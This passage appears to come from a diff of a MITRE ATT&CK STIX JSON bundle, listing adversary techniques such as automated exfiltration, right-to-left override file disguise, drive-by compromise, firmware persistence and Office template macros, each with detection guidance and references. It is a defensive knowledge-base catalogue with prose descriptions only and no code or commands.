3, 2018.", + "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + }, + { + "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + }, + { + "source_name": "Enigma MMC20 COM Jan 2017", + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + }, + { + "source_name": "Enigma DCOM Lateral Movement Jan 2017", + "description": "Nelson, M. (2017, January 23). Lateral Movement via DCOM: Round 2. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/" + }, + { + "source_name": "Enigma Excel DCOM Sept 2017", + "description": "Nelson, M. (2017, September 11). Lateral Movement using Excel.Application and DCOM. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/" + }, + { + "source_name": "Cyberreason DCOM DDE Lateral Movement Nov 2017", + "description": "Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral movement via DCOM. Retrieved November 21, 2017.", + "url": "https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-01-24T00:04:01.066Z", + "name": "Automated Exfiltration", + "description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020) \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ExtraHop" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "created": "2017-05-31T21:30:29.458Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1020", + "external_id": "T1020" + }, + { + "source_name": "ESET Gamaredon June 2020", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Client Configurations", + "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c", + "created": "2020-10-02T16:47:16.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1592/004", + "external_id": "T1592.004" + }, + { + "source_name": "ATT ScanBox", + "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", + "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-15T00:25:36.502Z", + "name": "Disable or Modify Cloud Firewall", + "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Expel" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "created": "2020-06-24T16:55:46.243Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/007", + "external_id": "T1562.007" + }, + { + "source_name": "Expel IO Evil in AWS", + "description": "A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.", + "url": "https://expel.io/blog/finding-evil-in-aws/" + }, + { + "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022", + "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.", + "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-08T18:54:40.925Z", + "name": "Autorun Image", + "description": "Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removeable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor. \n\nAn example could include an adversary gaining access to a hypervisor through the management interface to modify a virtual machine’s hardware configuration. They could then deploy an iso image with a malicious AutoRun script to cause the virtual machine to automatically execute the code contained on the disk image. This would enable the execution of malicious code within a virtual machine without needing any prior remote access to that system.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Drive: Drive Creation", + "Process: Process Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "created": "2024-03-26T15:39:19.473Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0895", + "external_id": "T0895" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Right-to-Left Override", + "description": "Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png.(Citation: Infosecinstitute RTLO Technique)\n\nAdversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection methods should include looking for common formats of RTLO characters within filenames such as \\u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "created": "2020-02-10T19:55:29.385Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/002", + "external_id": "T1036.002" + }, + { + "source_name": "Infosecinstitute RTLO Technique", + "description": "Security Ninja. (2015, April 16). Spoof Using Right to Left Override (RTLO) Technique. Retrieved April 22, 2019.", + "url": "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/" + }, + { + "source_name": "Trend Micro PLEAD RTLO", + "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/" + }, + { + "source_name": "Kaspersky RTLO Cyber Crime", + "description": "Firsh, A.. (2018, February 13). Zero-day vulnerability in Telegram - Cybercriminals exploited Telegram flaw to launch multipurpose attacks. Retrieved April 22, 2019.", + "url": "https://securelist.com/zero-day-vulnerability-in-telegram/83800/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Malware", + "description": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.\n\nIn addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific MaaS offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7807d3a4-a885-4639-a786-c1ed41484970", + "created": "2020-10-01T02:06:11.499Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588/001", + "external_id": "T1588.001" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.", + "url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:06.780Z", + "name": "Drive-by Compromise", + "description": "Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. \n\nThe adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. \n\nThe National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content", + "Process: Process Creation", + "File: File Creation", + "Network Traffic: Network Connection Creation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0817", + "external_id": "T0817" + }, + { + "source_name": "Cybersecurity & Infrastructure Security Agency March 2018", + "description": "Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-074A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Component Firmware", + "description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms.\n\nDisk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "Host intrusion prevention systems", + "File monitoring" + ], + "x_mitre_permissions_required": [ + "SYSTEM" + ], + "x_mitre_system_requirements": [ + "Ability to update component device firmware from the host operating system." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", + "created": "2019-12-19T20:21:21.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1542/002", + "external_id": "T1542.002" + }, + { + "source_name": "SanDisk SMART", + "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018." + }, + { + "source_name": "SmartMontools", + "description": "smartmontools. (n.d.). smartmontools. Retrieved October 2, 2018.", + "url": "https://www.smartmontools.org/" + }, + { + "source_name": "ITWorld Hard Disk Health Dec 2014", + "description": "Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018.", + "url": "https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Indicator Removal", + "description": "Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.\n\nRemoval of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Brad Geesaman, @bradgeesaman", + "Ed Williams, Trustwave, SpiderLabs", + "Blake Strom, Microsoft 365 Defender" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system may require different detection mechanisms.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers", + "Network", + "Office 365", + "Google Workspace" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Log analysis", + "Host intrusion prevention systems", + "Anti-virus" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "created": "2017-05-31T21:30:55.892Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1070", + "external_id": "T1070" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2) \n\nArtifacts and evidence of symmetric key exchange may be recoverable by analyzing network traffic or looking for hard-coded values within malware. If recovered, these keys can be used to decrypt network data from command and control channels. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--79a4052e-1a89-4b09-aea6-51f1d11fe19c", + "created": "2020-03-15T15:30:42.378Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048/001", + "external_id": "T1048.001" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Office Template Macros", + "description": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) Modification to base templates, like Normal.dotm, should also be investigated since the base templates should likely not contain VBA macros. Changes to the Office macro security settings should also be investigated.(Citation: GlobalDotName Jun 2019)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21", + "created": "2019-11-07T20:29:17.788Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1137/001", + "external_id": "T1137.001" + }, + { + "source_name": "Microsoft Change Normal Template", + "description": "Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.", + "url": "https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea" + }, + { + "source_name": "MSDN VBA in Office", + "description": "Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.", + "url": "https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office" + }, + { + "source_name": "enigma0x3 normal.dotm", + "description": "Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.", + "url": "https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/" + }, + { + "source_name": "Hexacorn Office Template Macros", + "description": "Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. Retrieved July 3, 2017.", + "url": "http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/" + }, + { + "source_name": "GlobalDotName Jun 2019", + "description": "Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence 